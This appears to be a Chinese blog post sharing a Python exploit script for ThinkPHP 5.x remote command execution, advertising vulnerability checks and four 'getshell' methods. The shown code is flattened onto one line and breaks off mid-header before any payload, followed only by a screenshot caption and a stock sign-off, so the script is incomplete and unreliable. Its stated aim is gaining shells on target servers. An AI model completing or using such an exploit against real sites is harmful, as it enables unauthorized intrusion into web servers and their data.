加了三个验证漏洞以及四个getshell方法

# /usr/bin/env python3# -*- coding: utf-8 -*-# @Author: Morker# @Email: [email]admin@nsf.me[/email]# @Blog: [url]http://nsf.me/[/url] import requestsimport sys def demo(): print(' _______ _ _ _ _____ _ _ _____ ') print(' |__ __| | (_) | | | __ \| | | | __ \ ') print(' | | | |__ _ _ __ | | _| |__) | |__| | |__) |') print(''' | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''') print(' | | | | | | | | | | <| | | | | | | ') print(' |_| |_| |_|_|_| |_|_|\_\_| |_| |_|_| ') print() print('\tThinkPHP 5.x (v5.0.23 and v5.1.31 following version).') print('\tRemote command execution exploit.') print('\tVulnerability verification and getshell.') print('\tTarget: http://target/public') print()class ThinkPHP(): def __init__(self,web): self.web = web self.headers = { "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0", "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding" : "gzip, deflate", "Content-Type" : "application/x-/

效果图：

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持。